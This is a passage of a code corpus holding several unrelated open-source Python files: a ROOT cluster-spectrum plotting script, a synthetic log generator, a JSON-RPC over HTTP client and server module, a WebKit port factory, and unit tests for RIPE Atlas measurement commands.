                pad = self._OpenPadByRowCol(row, col)
                pad.DrawFrame(frames[col])
                # right-hand column shows the ratio plots
                doRatio = False
                if col == 1:
                    doRatio = True
                else:
                    # only the spectrum panels use a log scale
                    pad.GetPad().SetLogy(True)
                pad.DrawLabel(0.15, 0.15, 0.65, 0.22, modes[row])
                if col == 0:
                    # min-bias reference only makes sense on the raw spectrum
                    pad.DrawGraphicsObject(comparisonObjects[row].GetGraphicsInRange("MinBias", False), True, "Min. Bias")
                for t in ["EMCJHigh", "EMCJLow", "EMCGHigh", "EMCGLow"]:
                    pad.DrawGraphicsObject(comparisonObjects[row].GetGraphicsInRange(t, doRatio), True, t)
                if row == 0 and col == 0:
                    # single legend, drawn once on the first panel
                    pad.CreateLegend(0.5, 0.65, 0.89, 0.89)
        self._canvas.cd()
class ClusterComparison:
    """Holds min-bias and triggered spectra, and their ratios, for one
    cluster type (calibrated or uncalibrated)."""

    def __init__(self, mytype, minbias, triggered):
        # NOTE(review): mytype is currently unused; kept for interface
        # compatibility with existing callers
        self.__minBias = minbias
        self.__triggered = triggered
        self.__ratios = self.__CalculateRatios()

    def GetGraphicsInRange(self, trigger, isRatio = False):
        """Return a styled GraphicsObject for *trigger* in 0.1 < E < 100 GeV.

        For triggered classes, *isRatio* selects the trigger/min-bias ratio
        instead of the raw spectrum.
        """
        graphics = None
        styles = {"MinBias":Style(kBlack, 20), "EMCJHigh":Style(kBlue, 24), "EMCJLow":Style(kRed, 26), "EMCGHigh":Style(kGreen,25), "EMCGLow":Style(kOrange,27)}
        # was 'trigger is "MinBias"': identity comparison against a string
        # literal only works via CPython interning -- compare by value
        if trigger == "MinBias":
            graphics = GraphicsObject(HistToGraph(self.__minBias, 0.1, 100.), styles["MinBias"])
        else:
            mydict = self.__triggered
            if isRatio:
                mydict = self.__ratios
            graphics = GraphicsObject(HistToGraph(mydict[trigger], 0.1, 100.), styles[trigger])
        return graphics

    def __CalculateRatios(self):
        """Compute trigger/min-bias ratio histograms for every trigger class."""
        ratios = {}
        for trg in self.__triggered.keys():
            ratios[trg] = MakeRatio(self.__triggered[trg], self.__minBias)
        return ratios
def MakeClusterEnergySpectrum(data, trigger):
    """Project calibrated and uncalibrated cluster energy spectra for *trigger*.

    Applies a +-10 cm vertex cut and pileup rejection before projecting, and
    resets the container afterwards so the cuts don't leak into later calls.
    Returns a dict with keys "Calib" and "Uncalib".
    """
    cont = data.GetData(trigger)
    cont.SetVertexRange(-10, 10)
    cont.SetPileupRejection(True)
    result = {"Calib": cont.MakeClusterProjection(0, "Calib", "ClustECalib%s" %(trigger)), "Uncalib":cont.MakeClusterProjection(0, "Uncalib", "ClustEUncalib%s" %(trigger))}
    cont.Reset()
    return result
def DrawClusters(fileformat = "lego"):
    """Entry point: build the four-panel cluster comparison plot.

    Min-bias spectra come from the LHC13c sample; triggered spectra from the
    merged LHC13d/e sample.

    :param fileformat: input file layout understood by ResultDataBuilder
    :return: the created ClusterComparisonPlot (kept alive by the caller)
    """
    readerDE = ResultDataBuilder(fileformat, "merged_DE/AnalysisResults.root")
    dataDE = readerDE.GetResults()
    dataDE.SetName("LHC13de")
    readerC = ResultDataBuilder(fileformat, "LHC13c/AnalysisResults.root")
    dataC = readerC.GetResults()
    dataC.SetName("LHC13c")
    clustersCalibTRG = {}
    clustersUncalibTRG = {}
    clustersMB = MakeClusterEnergySpectrum(dataC, "MinBias")
    for t in ["EMCJHigh", "EMCJLow", "EMCGHigh", "EMCGLow"]:
        res = MakeClusterEnergySpectrum(dataDE, t)
        clustersCalibTRG[t] = res["Calib"]
        clustersUncalibTRG[t] = res["Uncalib"]
    plot = ClusterComparisonPlot(ClusterComparison("Calib", clustersMB["Calib"], clustersCalibTRG), ClusterComparison("Uncalib", clustersMB["Uncalib"], clustersUncalibTRG))
    plot.Create()
    return plot
|
bsd-3-clause
|
JennyChi/Script-helper
|
BAT/nonclustering/DC/size_simple_event.py
|
3
|
1771
|
## file_simple_event.py
# Author: Chen-Ning (Jenny) Chi
# Date: 2011 Sep
###########################################################
## The program will generate & input simple event.
#  Support files & directory.
#  Could specify the new file to create the specified size events.
#  Could specify how many events are going to be input.
#  Could specify the inputting frequency.
###########################################################
# NOTE: Python 2 script (print statements, string module functions).

HELP_MESSAGE = """
-help : Print out possible parameters
-d [string] : the data which we want to add new event. Default: test.log
-s [int] : size of events. Default: 1MB
"""

import sys, time, string, random

## Default settings
data = "test.log"
# NOTE(review): default is 3 * 10^6 bytes (~3 MB), although the help text
# above says 1MB -- confirm which is intended
volume = pow(10, 6) * 3

## Reading parameters (naive scan: each flag's value is taken from the
## following argv slot)
for cnt in range(len(sys.argv)):
    if string.find(sys.argv[cnt], "-h") == 0:
        print HELP_MESSAGE
        sys.exit(0)
    if string.find(sys.argv[cnt], "-d") == 0:
        data = str(sys.argv[cnt+1])
    if string.find(sys.argv[cnt], "-s") == 0:
        volume = int(sys.argv[cnt+1])

print "Input data to "+data
print "Total size of events: "+str(volume)

counter = 0
size = 0
# Append synthetic log lines until the requested byte volume is reached.
while size < volume:
    counter = counter + 1
    input_message = ""
    input_message = "line " + str(counter) + " "
    input_message = input_message + time.asctime(time.localtime()) + " "
    input_message = input_message + "counter=" + str(counter) + ", "
    input_message = input_message + "state=" + str(random.randrange(0, 9, 1)) + ", "
    input_message = input_message + "ip=140.116." + str(random.randrange(0, 255, 1)) + "." + str(random.randrange(0, 255, 1)) + "\n"
    # file is opened/closed per event so each line hits disk immediately
    file_out = open(data, 'a')
    file_out.write(input_message)
    file_out.close()
    size = size + len(input_message)

print "Number of events: " +str(counter)+ ", total size: " +str(size)
|
apache-2.0
|
moritz-wundke/Concurrent
|
concurrent/core/transport/pyjsonrpc/http.py
|
1
|
8216
|
#!/usr/bin/env python
# coding: utf-8
import sys
import urllib2
import base64
import BaseHTTPServer
import SocketServer
import httplib
import urllib
import urlparse
from StringIO import StringIO
import gzip
import rpcrequest
import rpcresponse
import rpcerror
import rpclib
from rpcjson import json
def http_request(url, json_string, username = None, password = None):
    """
    Fetch data from webserver (POST request)

    :param url: URL of the JSON-RPC handler
    :param json_string: JSON-String
    :param username: If *username* is given, BASE authentication will be used.
    :param password: Password for BASE authentication.
    :return: response body as a string (gzip-decoded when the server
        compressed it)
    """
    request = urllib2.Request(url, data = json_string)
    request.add_header("Content-Type", "application/json")
    request.add_header("Content-Length", len(json_string))
    if username:
        # [:-1] strips the trailing newline that encodestring appends
        base64string = base64.encodestring('%s:%s' % (username, password))[:-1]
        request.add_header("Authorization", "Basic %s" % base64string)
    # enable gzip content
    request.add_header('Accept-encoding', 'gzip')
    response = urllib2.urlopen(request)
    if response.info().get('Content-Encoding') == 'gzip':
        buf = StringIO( response.read() )
        f = gzip.GzipFile(fileobj=buf)
        response_string = f.read()
    else:
        response_string = response.read()
    response.close()
    return response_string
class HttpClient(object):
    """JSON-RPC over HTTP client.

    Methods can be called either explicitly via ``client.call("name", ...)``
    or via attribute access: ``client.name(...)``.
    """

    class _Method(object):
        # Proxy so that client.some_method(...) becomes
        # client.call("some_method", ...)
        def __init__(self, http_client_instance, method):
            self.http_client_instance = http_client_instance
            self.method = method

        def __call__(self, *args, **kwargs):
            return self.http_client_instance.call(self.method, *args, **kwargs)

    def __init__(
        self,
        url,
        username = None,
        password = None
    ):
        """
        :param url: URL to the JSON-RPC handler on the HTTP-Server.
            Example: ``"https://example.com/jsonrpc"``

        :param username: If *username* is given, BASE authentication will be used.
        :param password: Password for BASE authentication.
        """
        self.url = url
        self.username = username
        self.password = password

    def call(self, method, *args, **kwargs):
        """
        Creates the JSON-RPC request string, calls the HTTP server, converts
        JSON-RPC response string to python and returns the result.

        :param method: Name of the method which will be called on the HTTP server.
            Or a list with RPC-Request-Dictionaries. Syntax::

                "<MethodName>" or [<JsonRpcRequestDict>, ...]

            RPC-Request-Dictionaries will be made with the function
            *rpcrequest.create_request_dict()*.

        Raises the matching *rpcerror* exception if the server returned an
        error response.
        """
        # Create JSON-RPC-request
        if isinstance(method, basestring):
            request_json = rpcrequest.create_request_json(method, *args, **kwargs)
        else:
            request_json = json.dumps(method)
            # args/kwargs make no sense with prebuilt request dicts
            assert not args and not kwargs

        # Call the HTTP-JSON-RPC server
        response_json = http_request(
            url = self.url,
            json_string = request_json,
            username = self.username,
            password = self.password
        )

        # Convert JSON-RPC-response to python-object
        response = rpcresponse.parse_response_json(response_json)
        if response.error:
            # Raise error
            raise rpcerror.jsonrpcerrors[response.error.code](
                message = response.error.message,
                data = response.error.data
            )
        else:
            # Return result
            return response.result

    def __call__(self, method, *args, **kwargs):
        """
        Redirects the direct call to *self.call*
        """
        return self.call(method, *args, **kwargs)

    def __getattr__(self, method):
        """
        Allows the usage of attributes as *method* names.
        """
        return self._Method(http_client_instance = self, method = method)
class ThreadingHttpServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
    """
    Threading HTTP Server

    The ThreadingMixIn makes each request run in its own thread; no extra
    state or behaviour is needed here.
    """
    pass
class HttpRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler, rpclib.JsonRpc):
    """
    HttpRequestHandler for JSON-RPC-Requests

    Info: http://www.simple-is-better.org/json-rpc/transport_http.html
    """

    # HTTP/1.1 enables keep-alive; requires a correct Content-Length on
    # every response (see set_content_length)
    protocol_version = "HTTP/1.1"
    #server_version = "BaseHTTP/" + __version__

    def set_content_type_json(self):
        """
        Set content-type to "application/json"
        """
        self.send_header("Content-Type", "application/json")

    def set_no_cache(self):
        """
        Disable caching
        """
        self.send_header("Cache-Control", "no-cache")
        self.send_header("Pragma", "no-cache")

    def set_content_length(self, length):
        """
        Set content-length-header
        """
        self.send_header("Content-Length", str(length))

    def do_GET(self):
        """
        Handles HTTP-GET-Request

        Rebuilds a JSON-RPC request from the URL query string fields
        (jsonrpc, id, method, params) and dispatches it.
        """
        # Parse URL query
        query = urlparse.parse_qs(urllib.splitquery(self.path)[1])

        # jsonrpc
        jsonrpc = query.get("jsonrpc")
        if jsonrpc:
            jsonrpc = jsonrpc[0]

        # id
        id = query.get("id")
        if id:
            id = id[0]

        # method
        method = query.get("method")
        if method:
            method = method[0]

        # params: a JSON array means positional args, an object keyword args
        args = []
        kwargs = {}
        params = query.get("params")
        if params:
            params = json.loads(params[0])
            if isinstance(params, list):
                args = params
                kwargs = {}
            elif isinstance(params, dict):
                args = []
                kwargs = params

        # Create JSON reqeust string
        request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
        request_dict["jsonrpc"] = jsonrpc
        request_dict["id"] = id
        request_json = json.dumps(request_dict)

        # Call
        response_json = self.call(request_json)

        # Return result
        self.send_response(code = httplib.OK)
        self.set_content_type_json()
        self.set_no_cache()
        self.set_content_length(len(response_json))
        self.end_headers()
        self.wfile.write(response_json)

    def do_POST(self):
        """
        Handles HTTP-POST-Request

        Reads the JSON-RPC request body (sized by Content-Length),
        dispatches it and writes the JSON response back.
        """
        # Read JSON request
        content_length = int(self.headers.get("Content-Length", 0))
        request_json = self.rfile.read(content_length)

        # Call
        response_json = self.call(request_json)

        # Return result
        self.send_response(code = httplib.OK)
        self.set_content_type_json()
        self.set_no_cache()
        self.set_content_length(len(response_json))
        self.end_headers()
        self.wfile.write(response_json)
        return
def handle_cgi_request(methods = None):
    """
    Gets the JSON-RPC request from CGI environment and returns the
    result to STDOUT

    POST requests carry the JSON body on stdin; GET requests are rebuilt
    from the query-string fields (jsonrpc, id, method, params).

    :param methods: method table passed through to rpclib.JsonRpc
    """
    import cgi
    import cgitb
    cgitb.enable()

    # get response-body
    request_json = sys.stdin.read()
    if request_json:
        # POST
        request_json = urlparse.unquote(request_json)
    else:
        # GET
        args = []
        kwargs = {}
        fields = cgi.FieldStorage()
        jsonrpc = fields.getfirst("jsonrpc")
        id = fields.getfirst("id")
        method = fields.getfirst("method")
        params = fields.getfirst("params")
        if params:
            params = json.loads(params)
            # a JSON array means positional args, an object keyword args
            if isinstance(params, list):
                args = params
                kwargs = {}
            elif isinstance(params, dict):
                args = []
                kwargs = params

        # Create JSON reqeust string
        request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
        request_dict["jsonrpc"] = jsonrpc
        request_dict["id"] = id
        request_json = json.dumps(request_dict)

    # Call
    response_json = rpclib.JsonRpc(methods = methods).call(request_json)

    # Return headers
    print "Content-Type: application/json"
    print "Cache-Control: no-cache"
    print "Pragma: no-cache"
    print

    # Return result
    print response_json
|
mit
|
angelman/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/port/factory.py
|
118
|
5888
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Factory method to retrieve the appropriate port implementation."""
import fnmatch
import optparse
import re
from webkitpy.port import builders
def platform_options(use_globs=False):
    """Return the optparse options used to select a platform/port.

    :param use_globs: when True, the option values are glob patterns
        (e.g. "efl*") matching several ports rather than concrete names.
    """
    return [
        optparse.make_option('--platform', action='store',
            help=('Glob-style list of platform/ports to use (e.g., "mac*")' if use_globs else 'Platform to use (e.g., "mac-lion")')),
        optparse.make_option('--efl', action='store_const', dest='platform',
            const=('efl*' if use_globs else 'efl'),
            help=('Alias for --platform=efl*' if use_globs else 'Alias for --platform=efl')),
        optparse.make_option('--gtk', action='store_const', dest='platform',
            const=('gtk*' if use_globs else 'gtk'),
            help=('Alias for --platform=gtk*' if use_globs else 'Alias for --platform=gtk')),
        optparse.make_option('--qt', action='store_const', dest="platform",
            const=('qt*' if use_globs else 'qt'),
            # was 'Alias for --platform=qt' in both branches; the glob branch
            # should advertise the glob pattern, matching --efl/--gtk above
            help=('Alias for --platform=qt*' if use_globs else 'Alias for --platform=qt')),
    ]
def configuration_options():
    """Return the optparse options controlling build configuration and
    architecture."""
    target = optparse.make_option(
        "-t", "--target", dest="configuration", help="(DEPRECATED)")
    # FIXME: --help should display which configuration is default.
    debug = optparse.make_option(
        '--debug', action='store_const', const='Debug', dest="configuration",
        help='Set the configuration to Debug')
    release = optparse.make_option(
        '--release', action='store_const', const='Release', dest="configuration",
        help='Set the configuration to Release')
    thirty_two_bit = optparse.make_option(
        '--32-bit', action='store_const', const='x86', default=None, dest="architecture",
        help='use 32-bit binaries by default (x86 instead of x86_64)')
    return [target, debug, release, thirty_two_bit]
def _builder_options(builder_name):
configuration = "Debug" if re.search(r"[d|D](ebu|b)g", builder_name) else "Release"
is_webkit2 = builder_name.find("WK2") != -1
builder_name = builder_name
return optparse.Values({'builder_name': builder_name, 'configuration': configuration, 'webkit_test_runner': is_webkit2})
class PortFactory(object):
    """Creates Port objects for the host platform or an explicit port name."""

    # Candidate port implementations as "module.ClassName", resolved
    # relative to this package; get() checks them in order.
    PORT_CLASSES = (
        'efl.EflPort',
        'gtk.GtkPort',
        'mac.MacPort',
        'mock_drt.MockDRTPort',
        'qt.QtPort',
        'test.TestPort',
        'win.WinPort',
    )

    def __init__(self, host):
        self._host = host

    def _default_port(self, options):
        """Guess the port name for the current host platform."""
        platform = self._host.platform
        if platform.is_linux() or platform.is_freebsd():
            return 'qt-linux'
        elif platform.is_mac():
            return 'mac'
        elif platform.is_win():
            return 'win'
        raise NotImplementedError('unknown platform: %s' % platform)

    def get(self, port_name=None, options=None, **kwargs):
        """Returns an object implementing the Port interface. If
        port_name is None, this routine attempts to guess at the most
        appropriate port on this platform."""
        port_name = port_name or self._default_port(options)
        for port_class in self.PORT_CLASSES:
            module_name, class_name = port_class.rsplit('.', 1)
            # level=-1 requests an implicit relative import (Python 2 only)
            module = __import__(module_name, globals(), locals(), [], -1)
            cls = module.__dict__[class_name]
            if port_name.startswith(cls.port_name):
                port_name = cls.determine_full_port_name(self._host, options, port_name)
                return cls(self._host, port_name, options=options, **kwargs)
        raise NotImplementedError('unsupported platform: "%s"' % port_name)

    def all_port_names(self, platform=None):
        """Return a list of all valid, fully-specified, "real" port names.

        This is the list of directories that are used as actual baseline_paths()
        by real ports. This does not include any "fake" names like "test"
        or "mock-mac", and it does not include any directories that are not.

        If platform is not specified, we will glob-match all ports"""
        platform = platform or '*'
        return fnmatch.filter(builders.all_port_names(), platform)

    def get_from_builder_name(self, builder_name):
        """Map a buildbot builder name to a configured Port."""
        port_name = builders.port_name_for_builder_name(builder_name)
        assert port_name, "unrecognized builder name '%s'" % builder_name
        return self.get(port_name, _builder_options(builder_name))
|
bsd-3-clause
|
pierky/ripe-atlas-tools
|
tests/commands/measure.py
|
1
|
34634
|
# -*- coding: UTF-8 -*-
# Copyright (c) 2015 RIPE NCC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import copy
import unittest
from random import randint
# Python 3.4+ comes with mock in unittest
try:
from unittest import mock
except ImportError:
import mock
from ripe.atlas.tools.commands.measure.base import Command
from ripe.atlas.tools.commands.measure import (
PingMeasureCommand,
TracerouteMeasureCommand,
DnsMeasureCommand,
SslcertMeasureCommand,
HttpMeasureCommand,
NtpMeasureCommand,
)
from ripe.atlas.tools.exceptions import RipeAtlasToolsException
from ripe.atlas.tools.settings import Configuration
from ..base import capture_sys_output
class TestMeasureCommand(unittest.TestCase):
    """Tests for the "ripe-atlas measure" command family."""

    # dotted path of the configuration object; used as a mock.patch target
    CONF = "ripe.atlas.tools.commands.measure.base.conf"

    # measurement type name -> command class under test
    KINDS = {
        "ping": PingMeasureCommand,
        "traceroute": TracerouteMeasureCommand,
        "dns": DnsMeasureCommand,
        "sslcert": SslcertMeasureCommand,
        "http": HttpMeasureCommand,
        "ntp": NtpMeasureCommand,
    }
def setUp(self):
    """Show full diffs on assertion failures (expected outputs are long)."""
    self.maxDiff = None
def test_no_arguments(self):
    """Running "measure" with no type must raise with a usage message."""
    with capture_sys_output():
        with self.assertRaises(RipeAtlasToolsException) as e:
            Command().init_args([])
        self.assertTrue(
            str(e.exception).startswith("Usage: ripe-atlas measure <"))
def test_bad_type_argument(self):
    """An unknown measurement type must raise with a usage message."""
    with capture_sys_output():
        with self.assertRaises(RipeAtlasToolsException) as e:
            Command().init_args(["not-a-type"])
        self.assertTrue(
            str(e.exception).startswith("Usage: ripe-atlas measure <"))
@mock.patch(CONF, Configuration.DEFAULT)
def test_dry_run(self):
    """--dry-run prints the rendered definitions/sources without creating
    a measurement; checked with default tags and with explicit tags."""
    with capture_sys_output() as (stdout, stderr):
        cmd = PingMeasureCommand()
        cmd.init_args(["ping", "--target", "ripe.net", "--dry-run"])
        cmd.run()

    expected = (
        "\n"
        "Definitions:\n"
        "================================================================================\n"
        "target                ripe.net\n"
        "packet_interval       1000\n"
        "description           Ping measurement to ripe.net\n"
        "af                    4\n"
        "packets               3\n"
        "size                  48\n"
        "\n"
        "Sources:\n"
        "================================================================================\n"
        "requested             50\n"
        "type                  area\n"
        "value                 WW\n"
        "tags\n"
        "  include             system-ipv4-works\n"
        "  exclude             \n"
        "\n"
    )
    # compare as line sets: key order within the rendered blocks is not fixed
    self.assertEqual(
        set(stdout.getvalue().split("\n")),
        set(expected.split("\n"))
    )

    with capture_sys_output() as (stdout, stderr):
        cmd = PingMeasureCommand()
        cmd.init_args([
            "ping",
            "--target", "ripe.net",
            "--af", "6",
            "--include-tag", "alpha",
            "--include-tag", "bravo",
            "--include-tag", "charlie",
            "--exclude-tag", "delta",
            "--exclude-tag", "echo",
            "--exclude-tag", "foxtrot",
            "--dry-run"
        ])
        cmd.run()

    expected = (
        "\n"
        "Definitions:\n"
        "================================================================================\n"
        "target                ripe.net\n"
        "packet_interval       1000\n"
        "description           Ping measurement to ripe.net\n"
        "af                    6\n"
        "packets               3\n"
        "size                  48\n"
        "\n"
        "Sources:\n"
        "================================================================================\n"
        "requested             50\n"
        "type                  area\n"
        "value                 WW\n"
        "tags\n"
        "  include             alpha, bravo, charlie\n"
        "  exclude             delta, echo, foxtrot\n"
        "\n"
    )
    self.assertEqual(
        set(stdout.getvalue().split("\n")),
        set(expected.split("\n"))
    )
def test_clean_target(self):
    """clean_target() returns the target for ping, but None for DNS
    (a DNS measurement may rely on the probes' own resolvers)."""
    cmd = PingMeasureCommand()
    with capture_sys_output():
        cmd.init_args(["ping", "--target", "ripe.net"])
    self.assertEqual(cmd.clean_target(), "ripe.net")
    cmd = DnsMeasureCommand()
    with capture_sys_output():
        cmd.init_args(["dns", "--query-argument", "ripe.net"])
    self.assertEqual(cmd.clean_target(), None)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_ping(self):
    """Ping kwargs: defaults come from the spec; CLI flags override them."""
    spec = Configuration.DEFAULT["specification"]["types"]["ping"]
    cmd = PingMeasureCommand()
    cmd.init_args([
        "ping", "--target", "ripe.net"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "Ping measurement to ripe.net",
            "target": "ripe.net",
            "packets": spec["packets"],
            "packet_interval": spec["packet-interval"],
            "size": spec["size"]
        }
    )
    cmd = PingMeasureCommand()
    cmd.init_args([
        "ping",
        "--target", "ripe.net",
        "--af", "6",
        "--description", "This is my description",
        "--packets", "7",
        "--packet-interval", "200",
        "--size", "24"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": 6,
            "description": "This is my description",
            "target": "ripe.net",
            "packets": 7,
            "packet_interval": 200,
            "size": 24
        }
    )
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_traceroute(self):
    """Traceroute kwargs: spec defaults, full CLI override, and protocol
    normalisation from lower case."""
    spec = Configuration.DEFAULT["specification"]["types"]["traceroute"]
    cmd = TracerouteMeasureCommand()
    cmd.init_args([
        "traceroute", "--target", "ripe.net"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "Traceroute measurement to ripe.net",
            "target": "ripe.net",
            "packets": spec["packets"],
            "size": spec["size"],
            "destination_option_size": spec["destination-option-size"],
            "hop_by_hop_option_size": spec["hop-by-hop-option-size"],
            "dont_fragment": spec["dont-fragment"],
            "first_hop": spec["first-hop"],
            "max_hops": spec["max-hops"],
            "paris": spec["paris"],
            "port": spec["port"],
            "protocol": spec["protocol"],
            "timeout": spec["timeout"]
        }
    )
    cmd = TracerouteMeasureCommand()
    cmd.init_args([
        "traceroute",
        "--af", "6",
        "--description", "This is my description",
        "--target", "ripe.net",
        "--packets", "7",
        "--size", "24",
        "--destination-option-size", "12",
        "--hop-by-hop-option-size", "13",
        "--dont-fragment",
        "--first-hop", "2",
        "--max-hops", "5",
        "--paris", "8",
        "--port", "123",
        "--protocol", "TCP",
        "--timeout", "1500"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": 6,
            "description": "This is my description",
            "target": "ripe.net",
            "packets": 7,
            "size": 24,
            "destination_option_size": 12,
            "hop_by_hop_option_size": 13,
            "dont_fragment": True,
            "first_hop": 2,
            "max_hops": 5,
            "paris": 8,
            "port": 123,
            "protocol": "TCP",
            "timeout": 1500
        }
    )
    """Tests for the protocol provided in lower case"""
    # a lower-case --protocol value must be upper-cased in the kwargs
    cmd = TracerouteMeasureCommand()
    cmd.init_args([
        "traceroute", "--target", "ripe.net", "--protocol", "icmp"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "Traceroute measurement to ripe.net",
            "target": "ripe.net",
            "packets": spec["packets"],
            "size": spec["size"],
            "destination_option_size": spec["destination-option-size"],
            "hop_by_hop_option_size": spec["hop-by-hop-option-size"],
            "dont_fragment": spec["dont-fragment"],
            "first_hop": spec["first-hop"],
            "max_hops": spec["max-hops"],
            "paris": spec["paris"],
            "port": spec["port"],
            "protocol": "ICMP",
            "timeout": spec["timeout"]
        }
    )
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_dns(self):
    """_get_measurement_kwargs() for DNS measurements: configuration
    defaults, a fully-specified command line, and case-normalisation of
    --protocol, --query-class and --query-type."""
    spec = Configuration.DEFAULT["specification"]["types"]["dns"]
    # Defaults only: without an explicit --target, the probes' own
    # resolvers are used (use_probe_resolver=True).
    cmd = DnsMeasureCommand()
    cmd.init_args([
        "dns", "--query-argument", "ripe.net"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "DNS measurement for ripe.net",
            "query_class": spec["query-class"],
            "query_type": spec["query-type"],
            "query_argument": "ripe.net",
            "set_cd_bit": spec["set-cd-bit"],
            "set_do_bit": spec["set-do-bit"],
            "set_rd_bit": spec["set-rd-bit"],
            "set_nsid_bit": spec["set-nsid-bit"],
            "protocol": spec["protocol"],
            "retry": spec["retry"],
            "udp_payload_size": spec["udp-payload-size"],
            "use_probe_resolver": True,
        }
    )
    # Every option supplied explicitly; an explicit --target switches
    # use_probe_resolver off.
    cmd = DnsMeasureCommand()
    cmd.init_args([
        "dns",
        "--af", "6",
        "--description", "This is my description",
        "--target", "non-existent-dns.ripe.net",
        "--query-class", "CHAOS",
        "--query-type", "SOA",
        "--query-argument", "some arbitrary string",
        "--set-cd-bit",
        "--set-do-bit",
        "--set-rd-bit",
        "--set-nsid-bit",
        "--protocol", "TCP",
        "--retry", "2",
        "--udp-payload-size", "5"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": 6,
            "description": "This is my description",
            "target": "non-existent-dns.ripe.net",
            "query_class": "CHAOS",
            "query_type": "SOA",
            "query_argument": "some arbitrary string",
            "set_cd_bit": True,
            "set_do_bit": True,
            "set_rd_bit": True,
            "set_nsid_bit": True,
            "protocol": "TCP",
            "retry": 2,
            "udp_payload_size": 5,
            "use_probe_resolver": False
        }
    )
    """Testing for protocol argument in lower case"""
    # Lower-case --protocol must come back upper-cased.
    cmd = DnsMeasureCommand()
    cmd.init_args([
        "dns", "--query-argument", "ripe.net", "--protocol", "tcp"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "DNS measurement for ripe.net",
            "query_class": spec["query-class"],
            "query_type": spec["query-type"],
            "query_argument": "ripe.net",
            "set_cd_bit": spec["set-cd-bit"],
            "set_do_bit": spec["set-do-bit"],
            "set_rd_bit": spec["set-rd-bit"],
            "set_nsid_bit": spec["set-nsid-bit"],
            "protocol": "TCP",
            "retry": spec["retry"],
            "udp_payload_size": spec["udp-payload-size"],
            "use_probe_resolver": True,
        }
    )
    """Testing for query class in lower case"""
    # Lower-case --query-class must come back upper-cased.
    cmd = DnsMeasureCommand()
    cmd.init_args([
        "dns", "--query-argument", "ripe.net", "--query-class", "in"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "DNS measurement for ripe.net",
            "query_class": "IN",
            "query_type": spec["query-type"],
            "query_argument": "ripe.net",
            "set_cd_bit": spec["set-cd-bit"],
            "set_do_bit": spec["set-do-bit"],
            "set_rd_bit": spec["set-rd-bit"],
            "set_nsid_bit": spec["set-nsid-bit"],
            "protocol": spec["protocol"],
            "retry": spec["retry"],
            "udp_payload_size": spec["udp-payload-size"],
            "use_probe_resolver": True,
        }
    )
    """Testing for query type in lower case"""
    # Lower-case --query-type must come back upper-cased.
    cmd = DnsMeasureCommand()
    cmd.init_args([
        "dns", "--query-argument", "ripe.net", "--query-type", "txt"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "DNS measurement for ripe.net",
            "query_class": spec["query-class"],
            "query_type": "TXT",
            "query_argument": "ripe.net",
            "set_cd_bit": spec["set-cd-bit"],
            "set_do_bit": spec["set-do-bit"],
            "set_rd_bit": spec["set-rd-bit"],
            "set_nsid_bit": spec["set-nsid-bit"],
            "protocol": spec["protocol"],
            "retry": spec["retry"],
            "udp_payload_size": spec["udp-payload-size"],
            "use_probe_resolver": True,
        }
    )
@mock.patch(CONF, Configuration.DEFAULT)
